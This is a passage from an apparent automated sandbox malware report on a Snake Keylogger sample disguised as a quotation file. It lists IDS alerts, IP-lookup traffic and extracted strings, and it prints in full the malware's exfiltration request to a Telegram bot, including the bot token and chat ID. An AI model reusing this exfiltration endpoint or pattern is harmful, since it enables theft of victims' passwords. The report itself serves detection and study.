                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D0741h13_2_0A3D0498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D6B29h13_2_0A3D6880
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D0B99h13_2_0A3D08F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D6FAAh13_2_0A3D6D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D0FF1h13_2_0A3D0D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D7859h13_2_0A3D75B0

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:54598 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.11:54598 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:61943 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.11:61943 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.11:61939 -> 1.1.1.1:53
                Source: global trafficTCP traffic: 192.168.2.11:54597 -> 1.1.1.1:53
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ/sendDocument?chat_id=1695799026&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd65bb808330b7Host: api.telegram.orgContent-Length: 569Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ/sendDocument?chat_id=1695799026&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd65c385193e31Host: api.telegram.orgContent-Length: 569Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49719 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49723 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49709 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49712 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49706 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49717 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49739 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49727 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49708 -> 104.21.80.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:49707 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:49714 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ/sendDocument?chat_id=1695799026&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd65bb808330b7Host: api.telegram.orgContent-Length: 569Connection: Keep-Alive
                Source: vbc.exe, 00000008.00000002.3549250427.0000000007478000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: vbc.exe, 00000008.00000002.3549250427.000000000730E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000731C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007300000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007356000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007366000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000732A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000726D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006B5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C0A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006BEF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C44000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: vbc.exe, 00000008.00000002.3549250427.00000000072B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000730E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000731C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007300000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007356000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007366000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000732A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007338000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007261000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000726D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006B5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C0A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006B9F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006BEF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006B49000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C44000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C18000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: vbc.exe, 00000008.00000002.3549250427.00000000071A1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: QUOTATION 03664710859027.exe, 00000000.00000002.1116689822.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3545341483.0000000000417000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: svchost.exe, 0000000E.00000002.2839240892.000001B65C000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.14.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: vbc.exe, 00000008.00000002.3549250427.000000000730E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000731C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007300000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007356000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007366000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007285000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000732A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C0A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006BEF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C44000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006B74000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: QUOTATION 03664710859027.exe, 00000000.00000002.1115762220.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.00000000071A1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: IEGkgGtnYpDN.exe, 00000009.00000002.1164194374.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namex
                Source: vbc.exe, 00000008.00000002.3549250427.0000000007478000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: vbc.exe, 0000000D.00000002.3549205458.0000000006D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: vbc.exe, 0000000D.00000002.3549205458.0000000006D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ/sendDocument?chat_id=1695
                Source: edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                Source: svchost.exe, 0000000E.00000003.1203017616.000001B65BE00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.14.dr, edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                Source: vbc.exe, 00000008.00000002.3549250427.00000000072B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000730E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000731C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007300000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007356000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007366000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000732A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000726D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006B5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C0A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006B9F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006BEF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C44000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: QUOTATION 03664710859027.exe, 00000000.00000002.1116689822.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3545341483.0000000000417000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000726D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006B5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: vbc.exe, 0000000D.00000002.3549205458.0000000006C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: vbc.exe, 00000008.00000002.3549250427.00000000072B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000730E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000731C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007300000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007356000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007366000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000732A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C0A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006B9F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006BEF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006C44000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 